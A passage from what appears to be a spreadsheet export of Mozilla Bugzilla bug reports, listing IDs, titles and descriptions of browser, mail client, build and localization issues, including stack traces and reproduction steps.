    <t>After an import command that has been run on the dashboard screen refresh the projects list to include the newly imported project.</t>
  </si>
  <si>
    <t>CORE-342940</t>
  </si>
  <si>
    <t>cairo generates unprintable postscript</t>
  </si>
  <si>
    <t>Open http://www.mozilla.com/firefox/central/ with cairo enabled builds.
Print it nothing happened.
Enable the print postscript error in the printer there will be following error.
ERROR: typecheck
OFFENDING COMMAND: definefont
STACK:
/Font
-dictionary-
/CairoFont-0-0</t>
  </si>
  <si>
    <t>CORE-54270</t>
  </si>
  <si>
    <t>nsMenu.cpp on Mac asserts when a window is closed</t>
  </si>
  <si>
    <t>I'm hitting an assertion in nsMenu.cpp line 477 on window close. Stack is:
 Calling chain using A6/R1 links
  Back chain  ISA  Caller
  00000000    PPC  1F4963B8  
  0CDCF0C0    PPC  1F47C0A4  main+001AC
  0CDCF060    PPC  1F479A30  main1(int char** nsISupports*)+00870
  0CDCEDF0    PPC  1D048E4C  nsAppShellService::Run()+00054
  0CDCEDA0    PPC  1D91B0A8  nsAppShell::Run()+0004C
  0CDCED60    PPC  1D91B98C  nsMacMessagePump::DoMessagePump()+00044
  0CDCED10    PPC  1D91C0A8  nsMacMessagePump::DispatchEvent(int EventRecord*)+
00090
  0CDCECC0    PPC  1D91C93C  nsMacMessagePump::DoMouseDown(EventRecord&amp;)+00624
  0CDCEB50    PPC  1D91D2E0  
nsMacMessagePump::DispatchOSEventToRaptor(EventRecord&amp; GrafPort
*)+00044
  0CDCEB10    PPC  1D9179C8  nsMacMessageSink::DispatchOSEvent(EventRecord&amp; 
GrafPort*)+00048
  0CDCEAD0    PPC  1D910F34  nsMacWindow::HandleOSEvent(EventRecord&amp;)+00038
  0CDCEA90    PPC  1D91233C  nsMacEventHandler::HandleOSEvent(EventRecord&amp;)+000B0
  0CDCEA40    PPC  1D913E84  nsMacEventHandler::HandleMouseDownEvent(EventRecord&amp;
)+00570
  0CDCE890    PPC  1D911A04  
nsMacEventDispatchHandler::DispatchGuiEvent(nsWindow* unsigned 
int)+00090
  0CDCE820    PPC  1D8E5A84  nsWindow::DispatchWindowEvent(nsGUIEvent&amp;)+00028
  0CDCE7E0    PPC  1D8E598C  nsWindow::DispatchEvent(nsGUIEvent* nsEventStatus&amp;
)+000B8
  0CDCE790    PPC  1D050C8C  nsWebShellWindow::HandleEvent(nsGUIEvent*)+002B0
  0CDCE5D0    PPC  1D050994  nsWebShellWindow::Close()+0001C
  0CDCE590    PPC  1D057688  nsWebShellWindow::Destroy()+00318
  0CDCE4E0    PPC  1D07ABF0  nsXULWindow::Destroy()+00404
  0CDCE380    PPC  1D04BA04  
nsAppShellService::UnregisterTopLevelWindow(nsIXULWindow*)+00084
  0CDCE2E0    PPC  1D06A5C0  nsWindowMediator::UnregisterWindow(nsIXULWindow*)+
0009C
  0CDCE260    PPC  1D06A824  nsWindowMediator::UnregisterWindow(nsWindowInfo*)+
00188
  0CDCE1E0    PPC  1BB2AE64  RDFContainerImpl::RemoveElement(nsIRDFNode* int)+
001D0
  0CDCE150    PPC  1BA9FA9C  InMemoryDataSource::Unassert(nsIRDFResource* 
nsIRDFResource* n
sIRDFNode*)+001BC
  0CDCE0E0    PPC  1BAB7004  
CompositeDataSourceImpl::OnUnassert(nsIRDFDataSource* nsIRDFRes
ource* nsIRDFResource* nsIRDFNode*)+000D4
  0CDCE080    PPC  1BB90EA8  nsXULTemplateBuilder::OnUnassert(nsIRDFDataSource* 
nsIRDFResour
ce* nsIRDFResource* nsIRDFNode*)+000E0
  0CDCE020    PPC  1BB90C60  nsXULTemplateBuilder::Retract(nsIRDFResource* 
nsIRDFResource* 
nsIRDFNode*)+001C0
  0CDCDF20    PPC  1BB97788  nsXULTemplateBuilder::RemoveMember(nsIContent* 
nsIRDFResource*
 int)+005D0
  0CDCDBF0    PPC  1BB616F0  nsXULElement::RemoveChildAt(int int)+00AA8
  0CDCD9E0    PPC  1BAD5340  nsXULDocument::ContentRemoved(nsIContent* 
nsIContent* int)+000
80
  0CDCD980    PPC  1D903818  nsMenuBar::ContentRemoved(nsIDocument* nsIContent* 
nsIContent*
 int)+003C0
  0CDCD8B0    PPC  1D8FC57C  nsMenu::ContentRemoved(nsIDocument* nsIContent* 
int)+00048
  0CDCD870    PPC  1D8F406C  nsMenu::RemoveItem(unsigned int)+00024
  0CDCD830    PPC  1E272FD0  nsDebug::Assertion(const char* const char* const 
char* int)+0
005C
 Closing log</t>
  </si>
  <si>
    <t>TESTING-452327</t>
  </si>
  <si>
    <t>Create XUL app or extension to mirror major update window</t>
  </si>
  <si>
    <t>In testing the major update window we had to check a number of locales on a number of OSes/platforms to see if the content fit inside the window just perfect. Pascal created a webpage to do most of this but we found further problems when testing on the actual website using real builds.
We should have an extension or XUL app that is simply the major update window with a one-button push for showing or hiding the extension out of date issue.
I envision:
   -------------------------------------------
  |                  _____                    |
  |   Enter locale: |_____|                   |
  |    __           __                        |
  |   (__Show Notice__)                       |
  |                                           |
  |   _____________________________________   |
  |  |                                     |  |
  |  |                                     |  |
  |  |        Update window                |  |
  |  |                                     |  |
  |  |_____________________________________|  |
  |___________________________________________|
Since we're going to be testing this for every new major update it'd be nice to have a way to really test it.
Is this doable?</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-498756</t>
  </si>
  <si>
    <t>Restore nagios check mradm02:check_aus_throttle</t>
  </si>
  <si>
    <t>Nagios says:
mradm02:check_aus_throttle is CRITICAL: NRPE: Command check_aus_throttle not defined</t>
  </si>
  <si>
    <t>CORE-419786</t>
  </si>
  <si>
    <t>Link children associated with imagemaps do not implement the nsIAccessibleHyperLink interface</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Launch the test case in the URL above.
2. Launch Accerciser
3. Find a way to obtain the URI for each of the links in the imagemap. :-)
I can't figure it out.  I asked Surkov in #accessibility and he thinks it might be a bug so I'm filing it.
Given a regular ol' table cell with some text and a couple of links:
* The cell implements accessible Hypertext (ht)
* ht.getNLinks() returns 2
* ht.getLink(0) returns an accessible hyperlink associated with
  the first of the two links (hl1)
* ht.getLink(1) returns an accessible hyperlink associated with
  the second of the two links (hl2)
* hl1.getURI(0) gives you the URI associated with the first link
* hl2.getURI(0) gives you the URI associated with the second link
What could be simpler? :-)
Given the imagemap in the test case (and the one found at the bottom of safeway.com) you have a table cell which contains an image which contains children of ROLE_LINK (one child per region in the map):
* The cell implements accessible Hypertext (ht)
* ht.getNLinks() returns 1
* ht.getLink(0) returns an accessible hyperlink (hl1)
* hl1.getURI(0) gives you an empty string.
The image implements accessible Hyperlink but not accessible Hypertext. In the
spirit of being thorough I queried the image's accessible Hyperlink interface
and tried getURI(0).  Another empty string.
If this isn't a bug but mere user ignorance please accept my apologies and point me at the magic needed to get the URIs. :-)
Thank you very much in advance for looking at this!</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-228223</t>
  </si>
  <si>
    <t>update cvs access notice</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to change the message that appears at the bottom of the diff page in
Doctor to something that doesn't encourage every person who wants to make a typo
correction to apply for CVS access. Proposed text:
Don't have a CVS account? Save your changes as a file on your computer &lt;a
href=http://bugzilla.mozilla.org/enter_bug.cgi?format=__default__&amp;product=mozilla.org&amp;component=webmaster@mozilla.org&amp;version=other&amp;rep_platform=All&amp;op_sys=All&amp;bug_file_loc=http://www.mozilla.org/quality/index.html&amp;short_desc=%3CSummarize+your+changes+here.%3E&amp;comment=%3CDescribe+your+changes+here+in+more+detail.++After+you+commit+this+bug+report%2C%0D%0Aclick+the+%22Create+Attachment%22+link+to+add+the+changes+to+the+report+as+an%0D%0Aattachment.%3E&gt;file
a bug report about them (assign it to the page's owner if you can figure out
who that is from the &lt;a
href=http://www.mozilla.org/webtools/bonsai/cvslog.cgi?file=mozilla-org/html/quality/index.html&gt;change
log) then attach the changes to the bug report.  If you're interested in
contributing regularly to Mozilla documentation then &lt;a
href=http://bugzilla.mozilla.org/enter_bug.cgi?format=__default__&amp;product=mozilla.org&amp;component=CVS+Account+Request&amp;version=other&amp;rep_platform=All&amp;op_sys=All&amp;short_desc=webtree+CVS+account+for+%3Cyour+name+here%3E+-+%3Cyour+email+address+here%3E&amp;comment=%3CEnter+a+description+of+what+you+would+like+to+edit+on+the+web+site+here.++Note%0D%0Athat+you+need+someone+who+already+has+access+to+vouch+for+you.%3E&gt;File
a bug report about getting a CVS account.
</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-440242</t>
  </si>
  <si>
    <t>SymTable can easily be faster</t>
  </si>
  <si>
    <t>The new-string changes recently made in TT make it pretty easy to go back to have SymTable using interned-strings for the name portion of a key meaning the compares are faster. See attached patch for details.</t>
  </si>
  <si>
    <t>CORE-166168</t>
  </si>
  <si>
    <t>Last item of  is selected on reloading</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC en-US rv:1.1b) Gecko/20020825
Build Identifier: Mozilla/5.0 (Macintosh U PPC en-US rv:1.1b) Gecko/20020825
Last item of  is selected on reloading
if  has value=.
Reproducible: Always
Steps to Reproduce:
1. Go to testcase:
   http://bugzilla.mozilla.gr.jp/showattachment.cgi?attach_id=1111
2. Reload the page (without pressing Shift-key)
Actual Results:  
5th  item that is last one of option[value=] is selected.
Expected Results:  
1st  item that has selected attribute should be selected.
Confirming with 2002082503-trunk/Mac OS 9.2 and 2002083005-trunk/Linux.
Mozilla/1.1 final don't have this problem.</t>
  </si>
  <si>
    <t>PLUGINS_GRAVEYARD-494246</t>
  </si>
  <si>
    <t>[10.6] Java applets crash Firefox 3.0.11 on Mac OS X 10.6</t>
  </si>
  <si>
    <t>Java applets crash Firefox 3.0.11 on Mac OS X 10.6 (10A354 the latest seed).
100% reproducible crash on this page:
http://browserspy.dk/java.php
We don't know when 10.6 will be released but it may be before our next schedule Firefox security/stability update in July. As soon as it is released the reality is that a lot of people are going to install Firefox 3.0.x whether or not we claim to support 10.6. We may want to consider taking the latest JEP in Firefox 3.0.11 to avoid this major source of crashes.</t>
  </si>
  <si>
    <t>CALENDAR-344602</t>
  </si>
  <si>
    <t>Make Lightning use /m/c/locales and prepare for l10n translations</t>
  </si>
  <si>
    <t>Lightning hard codes itself as en-US now and doesn't have its dtd/properties in /l10n.</t>
  </si>
  <si>
    <t>CORE-489500</t>
  </si>
  <si>
    <t>Implement nsLocalFile::ResolveShortcut for WinCE</t>
  </si>
  <si>
    <t>Created attachment 373985
Proposed patch
Use SHGetShortcutTarget for WinCE.</t>
  </si>
  <si>
    <t>CORE-428657</t>
  </si>
  <si>
    <t>stop using deprecated winable.h use winuser.h instead</t>
  </si>
  <si>
    <t>We now require the Windows Vista SDK which no longer includes winable.h. According to MSDN (see URL) this library has been duplicated in winuser.h since January 2005. We should be using this library instead.
This impacts people who are building on Windows as after downloading the required SDKs they need to source and manually add winable.h to get a working build with accessibility.</t>
  </si>
  <si>
    <t>CORE-363117</t>
  </si>
  <si>
    <t>merge nsToolkit and nsToolkitBase in cocoa widgets</t>
  </si>
  <si>
    <t>Instead of moving nsToolkitBase into cocoa widgets we should just merge it into nsToolkit.</t>
  </si>
  <si>
    <t>CORE-522351</t>
  </si>
  <si>
    <t>Only do multi-process tabs when an attribute explicitly asks for it</t>
  </si>
  <si>
    <t>Only do the remote thing with  (or )
This will let me debug Fennec and still run DOM inspector.</t>
  </si>
  <si>
    <t>THUNDERBIRD-229096</t>
  </si>
  <si>
    <t>Blank toolbar after 19-Dec builds. No Icons at all.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7a) Gecko/20031220 Firebird/0.7+ (Optimized for Athlon XP SSE by Yek)
Build Identifier: Mozilla Thunderbird 0.5a (20031220) (or 21-Dec as well)
My build (on FC1) using gcc 3.3.2-2 and glic-2.3.2* worked fairly well on
19-Dec but somewhere's among the checkin's of late on the 19th and early on the
20th this problem came into being. 
No icons are visible on builds after the 20th. This doesn't occur on mozilla
builds post-19th. The toolbar(s) are completely blank regardless of theme
including MozillaFirebird default. No profile was used and an old profile was
tried but no difference. 
Check this thread for other's with this problem on their builds:
http://forums.mozillazine.org/viewtopic.php?p=305942#305942
Reproducible: Always
Steps to Reproduce:
1. checkout CVS as of ~600 PST 20-Dec
2. build
3. run tbird look at empty toolbar.
Actual Results:  
Saw completely empty toolbar.
Expected Results:  
Shown normal toolbar. I'll supply some images if I can to illustate. 
Linux Fedora core 1 athlonxp  nforce2 mobo
source from cvs co of 20-Dec ~600 PST.</t>
  </si>
  <si>
    <t>yekkim</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-486534</t>
  </si>
  <si>
    <t>config/nspr/Makefile.in should use core_abspath</t>
  </si>
  <si>
    <t>Created attachment 370669
Use core_abspath in config/nspr/Makefile.in rev. 1
config/nspr/Makefile.in should use core_abspath instead of pwd. This happens to work with pymake right now because it's being sent through the shell but it would be nice to fix that too.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-440116</t>
  </si>
  <si>
    <t>Update www.mozilla.com</t>
  </si>
  <si>
    <t>I'm pretty sure the cron job to update mozilla.com is still disabled so please update it manually for several bugs.  File changes are here:  http://viewvc.svn.mozilla.org/vc?view=rev&amp;revision=16010
This is pretty important.</t>
  </si>
  <si>
    <t>SEAMONKEY-630824</t>
  </si>
  <si>
    <t>Mail &amp; Newsgroups Account Settings window is truncated right and not resizeable.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.16) Gecko/20101123 SeaMonkey/2.0.11
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.16) Gecko/20101123 SeaMonkey/2.0.11
In the Mail  furthermore the right edge of the window cannot be dragged to enlarge the window.
Reproducible: Always
Steps to Reproduce:
1.Open window
2.Examine visually
3.Attempt to drag right border
Actual Results:  
The text and outline of the [Advanced] and [Browse] buttons are truncated right furthermore the right edge of the window cannot be dragged to enlarge the window.
Expected Results:  
the text and outline of the [Advanced] and [Browse] buttons are fully show and/or the right edge of the window can be dragged to enlarge the window.
Screenshot at http://picasaweb.google.com/Chaa006/ScreenCaptures?authkey=Gv1sRgCPLV3Kvwm6zA5QE#5569044272505081874</t>
  </si>
  <si>
    <t>P.Taylor</t>
  </si>
  <si>
    <t>TOOLKIT-505934</t>
  </si>
  <si>
    <t>Skip the write access checks on Windows CE</t>
  </si>
  <si>
    <t>Created attachment 390157
patch rev1
this should improve startup time.
Dave this should probably be done for the EM as well.</t>
  </si>
  <si>
    <t>THUNDERBIRD-220404</t>
  </si>
  <si>
    <t>Card Summary Pane menu item should be under View not View | Toolbars</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.5a) Gecko/20030729 Mozilla Firebird/0.6.1
Build Identifier: Mozilla Thunderbird 0.3 (20030924)
The Address Book includes a toggle menu item for displaying the Card Summary
Pane under the View | Toolbars submenu. It is not a toolbar though. The menu
item should be under View.
Reproducible: Always
Steps to Reproduce:
1. Click on the Address Book toolbar button. (Go to View | Toolbars |
Customize... if it isn't on your toolbar.)
2. Go to the View | Toolbars menu.
Actual Results:  
A Card Summary Pane menu item is under the Toolbar menu.
Expected Results:  
It should have been under the View menu.</t>
  </si>
  <si>
    <t>mxn</t>
  </si>
  <si>
    <t>CORE-406903</t>
  </si>
  <si>
    <t xml:space="preserve">[FIX]ASSERTION: Must be start token with </t>
  </si>
  <si>
    <t>Created attachment 291583
testcase
See testcase which triggers this assertion in current trunk build.
This assertion was added in bug 390565.</t>
  </si>
  <si>
    <t>SEAMONKEY-102709</t>
  </si>
  <si>
    <t>Passwords &amp; Permissions</t>
  </si>
  <si>
    <t>Keep obscure/encrypted setting when WALLET_DeleteAll is called</t>
  </si>
  <si>
    <t>Keep obscure/encrypted setting when WALLET_DeleteAll is called
See bug 99525 for discussion.</t>
  </si>
  <si>
    <t>inactive-mailbox</t>
  </si>
  <si>
    <t>FIREFOX-274712</t>
  </si>
  <si>
    <t>New Options Dialog</t>
  </si>
  <si>
    <t>Support instant apply prefs for MacOS X/GNOME progress towards new options
reorg (see URL).</t>
  </si>
  <si>
    <t>CORE-491127</t>
  </si>
  <si>
    <t>Scrolling with FF3.5Beta4 doesn't work on special made sites.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 de rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 de rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4
I was able to scroll through this program guide with my mouse and the stable Firefox 3 releases. Now with FF 3.5 Beta 4 it is not possible anymore.
Reproducible: Always</t>
  </si>
  <si>
    <t>blawhoa</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-85749</t>
  </si>
  <si>
    <t>potatoland.org - [LAYER]spud dud?  javascript gives up or stalls?</t>
  </si>
  <si>
    <t>if you look at the URL with Netscape 4.76 or IE 4.72.3110.8 SP1a
you see furious activity as you mouse around.  With Mozilla 0.9.1
you just get a static image.
also if you click through to pl.htm at the site mouse movement
again causes furious activity in the other browsers mentioned
above.
finally if you click on FEED (and then again on FEED) select
say the lycos URL and poke GO yet again you get frenetic
frivolity with the other 2 browsers and almost nothing with
Mozilla 0.9.1
BTW I'm open to advice on the summary.  I don't quite know how
to describe all this</t>
  </si>
  <si>
    <t>FIREFOX-241855</t>
  </si>
  <si>
    <t>Once the import wizard is opened it cannot be closed/canceled</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040426 Firefox/0.8.0+ (MMx2000)
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040426 Firefox/0.8.0+ (MMx2000)
When I click Import in a recent Firefox nighty (even in my built-from-CVS
MOZILLA_1_7_BRANCH Firefox) I cannot abort/close the inport wizard. I have to
close the browser.
Reproducible: Always
Steps to Reproduce:
1.click Import...
2.try to abort/close the wizard
Actual Results:  
I have to quit Firefox to get rid of the window
Expected Results:  
provide a close button (x in title bar) or Cancel</t>
  </si>
  <si>
    <t>CORE-327879</t>
  </si>
  <si>
    <t>Firefox under Linux draws text in an invisible font.  Highlighting does not make text appear but you can see text should be there.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20060216 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20060216 Firefox/1.6a1
I am not talking about black text on black background.
Basically some sites have text that Firefox will not render. Also highlighting it shows a strange behavior...the text does not appear rather your highlighting shows up but it is as if you are highlighting just a bunch of spaces.
I've noticed this sometimes before on websites that say like Here is the code and then they post the code and you see where the text should be but it's not there. If you highlight it it gets highlighted but it still doesn't appear.
Recently I've started noticing this a lot more. One of the sites I recently hit that has the problem is http://store.2600.com 
Reproducible: Always
Steps to Reproduce:
1.  Goto store.2600.com.
2.  Below 2600 Hacker Quarterly and above NEW: BROADCAST QUALITY should be some text but text does not appear.
Actual Results:  
Text is rendered/draw but in an invisible font.  Highlighting it is possible the colors get inverted but the text does not appear.
Using a zap colors javascript bookmarklet to convert all text to black and the background to white does not make the text appear either.
Expected Results:  
Text appears.
I have seen this on an increasing amount of web pages.  Especially I'll see something like this:
Oh yeah here is that bash command:
[what looks like a blank line but just has invisible text]
Next line of article.
The funny thing is that I don't think this was broken on 1.0.x but I could be wrong.
This is reproducable under Linux on both Firefox 1.5 (using safe mode) AND the 20060216 Firefox 1.6a1 nightly (using safe mode) as well as several earlier nightlies from the past week or two.</t>
  </si>
  <si>
    <t>6tsh7a001</t>
  </si>
  <si>
    <t>BUGZILLA-432907</t>
  </si>
  <si>
    <t>Create a JSON frontend for WebServices</t>
  </si>
  <si>
    <t>Instead of having a whole separate JSON API I want to create multiple frontends for the WebService interface we already have. That way we could have all sorts of different methods of exposing the same API.
The first new frontend will be a JSON frontend.</t>
  </si>
  <si>
    <t>FIREFOX-394372</t>
  </si>
  <si>
    <t>address bar identity UI looks different between large/small icon setting</t>
  </si>
  <si>
    <t>Created attachment 279019
Notice the difference in the address bar between using large and small icons.
Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a8pre) Gecko/2007083014 Minefield/3.0a8pre ID:2007083014
After the landing of bug 383183 you can see a subtle difference in the UI between when large icons are used and when small icons are used.</t>
  </si>
  <si>
    <t>FIREFOX-348865</t>
  </si>
  <si>
    <t>[Mac] Livemark and container icons in bookmarks toolbar have a darker background when hovered or opened</t>
  </si>
  <si>
    <t>After the visual refresh the icons in bookmarks bar have a noticeably darker background than the rest of the button when a button is hovered or opened.
When favicons for items are added (bug 348719) this problem affects those bookmark buttons as well.
This is probably another opacity-matching problem.</t>
  </si>
  <si>
    <t>jgoldman</t>
  </si>
  <si>
    <t>CORE-143460</t>
  </si>
  <si>
    <t>nsSVGRenderingContext.ccp slight change</t>
  </si>
  <si>
    <t>Changed the constant false to FALSE for successful compilation.
Created a cscope database and found false undefined except local
to a few files.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-179969</t>
  </si>
  <si>
    <t>printing with page setup scale &lt;40% results in blank pages.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:1.0.1) Gecko/20021113 Chimera/0.6+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:1.0.1) Gecko/20021113 Chimera/0.6+
When using the page set up to scale pages to less than 43% the resulting pages
come out blank (I think it has the correct number of blank pages).  (Mozilla
1.2b does print out tiny pages correctly.)  This happens to me at about the same
scale on either vertical or horizontal page orientation.
Reproducible: Always
Steps to Reproduce:
1. Set page set up scale to value less than 40%
2. Print page
Actual Results:  
Pages are blank (although the proper number of pages are blank as near as I can
tell).
Expected Results:  
Pages should printed with text / pictures from page.</t>
  </si>
  <si>
    <t>mkosnik+bugzilla</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-259228</t>
  </si>
  <si>
    <t>Edit Card dialog too high for some localizations.</t>
  </si>
  <si>
    <t>In some localizations (Khemer reported this) the vertical space needed is much
(100%) bigger than needed in english. 
This makes the Edit Card dialog grow to more than the available screen size.
What have been suggested in the l10n groups was to:
* Split the Address tab into 2 tabs. One for Home and one for Work
* Move the Phones part of contact to the respective Home and work
* Decrease the notes field height.
Benefits:
* The height is almost halfed.
* The contact tab is now solely for contacting we can do in thunderbird 
(cleaner seperation)
(There is a minor UI glitch that could be fixed in the same round. The group box
around Notes should be removed and replaced by an ordinary label.It is not
nice to have group boxes around single item.)</t>
  </si>
  <si>
    <t>CORE-348223</t>
  </si>
  <si>
    <t>Form Controls have lines through them when they come into view</t>
  </si>
  <si>
    <t>When scrolling form controls into view or moving other windows over them so they are covered then uncovered form controls end up with line(s) through them.
2006080914 problem starts
2006080904 no problem
This looks to have started after the landing of a patch from bug 342366.</t>
  </si>
  <si>
    <t>CORE-133853</t>
  </si>
  <si>
    <t>why always add  token into Tokenizer  even there is an  token already?</t>
  </si>
  <si>
    <t>http://lxr.mozilla.org/seamonkey/source/htmlparser/src/CNavDTD.cpp#504
it always add  token into Tokenizer.
I think if the Tokenizer has  Token already 
no need to add  token into it.
it will cause handleToken function to be called one time more.
I think that if Tokenizer's first Token isnot   Token then add one.
  if it is just skip.</t>
  </si>
  <si>
    <t>CORE-397524</t>
  </si>
  <si>
    <t>[FIX]Canvas security checks should use principals not URIs</t>
  </si>
  <si>
    <t>Created attachment 282294
Fix
Like the subject says.</t>
  </si>
  <si>
    <t>TESTOPIA-412792</t>
  </si>
  <si>
    <t>Attachements to the test case run logs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Build Identifier: Testopia 1.3 on Bugzilla 3.0.2
Gives possibility to save or link to test logs also for successful tests (in case of failure the attachements go to the respective bugs)
Reproducible: Always
Actual Results:  
Feature not available
Expected Results:  
Feature to set links or attachements</t>
  </si>
  <si>
    <t>thomas.letzkus</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-492670</t>
  </si>
  <si>
    <t>mozilla.jp</t>
  </si>
  <si>
    <t>Major Update page for JP does not fit in MU dialog causing scrollbars</t>
  </si>
  <si>
    <t>Created attachment 377035
Screenshot of dialog
When a user with the ja-jp-mac locale of Firefox 2.0.0.20 downloads a Major Update to 3.0.x the Major Update dialog shows the page http://mozilla.jp/firefox/3.0/details/ within the dialog. This page is much larger than the equivalent English pages causing a horizontal and vertical scrollbar to be rendered and content to be displayed outside of the default view in the dialog.
See attached image. This page should be fixed before the current update from 2.0.0.20 to 3.0.10 ships.</t>
  </si>
  <si>
    <t>CORE-488777</t>
  </si>
  <si>
    <t>Removal of createTemporaryClientID under netwerk/cache</t>
  </si>
  <si>
    <t>Created attachment 373229
tell it so
This method is deprecated it need to remove from teh tree.</t>
  </si>
  <si>
    <t>CORE-237006</t>
  </si>
  <si>
    <t>API for address of first stack variable to prevent Mozilla crashes</t>
  </si>
  <si>
    <t>To defend against a stack overflow caused by specially crafted JavaScript jseng
now provides API to set boundary address for stack consummation see bug 192414.
By default the checks are turned off and it is responsibility of jseng user to
call JS_SetThreadStackLimit with the correct information see bug 220408 .
Now the problem is how to get this maximum allowed stack address as it seems it
is not very well documented subject on any platform. If NSPR would provide such
API it would be great but past experience tells that it would not happen soon
(the original bug was reported more then a year). 
On other hand if the minimal stack address is known with precision of 10K or so
then adding 100K to it would provide a reasonable guess that would work out of
the box in the vast majority of cases. 
Obtaining the imprecise minimal address is also trivial for any NSPR thread as
it will always have some code near beginning of the stack that calls the
supplied thread callback and returning the address of the first declared NSPR
variable should be sufficient to prevent crashing Mozilla with trivial scripts
(like attachment 113927 which I just used to verify that it still crashes
Mozilla 1.6).
With such API it would be simple to close bug 220408 .</t>
  </si>
  <si>
    <t>CALENDAR-356722</t>
  </si>
  <si>
    <t>Calendar view displays without colors and no toolbar icons are shown</t>
  </si>
  <si>
    <t>Regression:
No toolbar icons shown for Lightning buttons
No icons shown in Add-ons Manager
Calendar view is displayed without styling/colors
Works in Lightning/0.4a1 2006-10-13-09-mozilla1.8
Fails in Lightning/0.4a1 2006-10-14-07-mozilla1.8</t>
  </si>
  <si>
    <t>BUGZILLA-103554</t>
  </si>
  <si>
    <t>CGI.pl: PutHeader and GetCommandMenu  should output correct HTML</t>
  </si>
  <si>
    <t>Every page bugzilla renders uses these two methods to output HTML and at the
moment the HTML is broken in accord to W3C HTML4.01 Transitional which is
AFAICT a worthy target. I agree this is a temporary fix but since XHTML is
still a ways off (and this is a step towards it) I'd like to fix these two
functions and get the W3C validator parsing our pages. This bug when fixed
allows bug 83058 to output correct HTML.</t>
  </si>
  <si>
    <t>CORE-497991</t>
  </si>
  <si>
    <t>Fix function calls in lirasm</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10
Refer to - lirasm
Enhancement lirasm - feature of function calls needs to be supported.
Reproducible: Always</t>
  </si>
  <si>
    <t>contactparitosh</t>
  </si>
  <si>
    <t>CORE-788532</t>
  </si>
  <si>
    <t>Add the new DOM bindings API to DOM lists</t>
  </si>
  <si>
    <t>CORE-487192</t>
  </si>
  <si>
    <t>Move both copies (one is char the other is PRUnichar) of nsWildCard into xpcom</t>
  </si>
  <si>
    <t>We've got two copies of nsWildCard.{hcpp} one for |char*| and one for |PRUnichar*|. Some fixes and license changes were only applied to the |char*| version and I'd like to address that by using template functions for the implementation code (wrapped inside / hidden by the publicly visible functions) so any future fixes only need to be made once and I'd like to move the result into xpcom/io/ or some other suitable place.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-281183</t>
  </si>
  <si>
    <t>SeaMonkey: Registration for Bolivian Quechua Localization</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 es-ES rv:1.5) Gecko/20031007
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 es-ES rv:1.5) Gecko/20031007
Ciber-runa would like to register a localization of Mozilla Suite in Bolivian
Quechua an indigenous language of the Andes.  There are roughly 2.5 million
Quechua speakers in Bolivia and 13 million in all the Andean countries.  We
already translated AbiWord into Quechua but right now we don't have any native
speakers working on Mozilla so we would appreciate lots of help.  
Group Name: Ciber-runa
My Contact Info: 
Amos Batto
636 E. Seminary St.
Greencastle IN 46135
USA
tel: (812)334-1821 or (765)653-7411
email: abatto@indiana.edu
Project web site: http://mypage.iu.edu/~abatto/mozilla.htm
Web site in English: http://mypage.iu.edu/~abatto/mozilla-en.htm
Language code for Bolivian Quechua: qu-BO
Reproducible: Always</t>
  </si>
  <si>
    <t>abatto</t>
  </si>
  <si>
    <t>FIREFOX-501820</t>
  </si>
  <si>
    <t>Synchronous AJAX calls cause entire browser to freeze until call completes</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.1 en-US rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.1 en-US rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
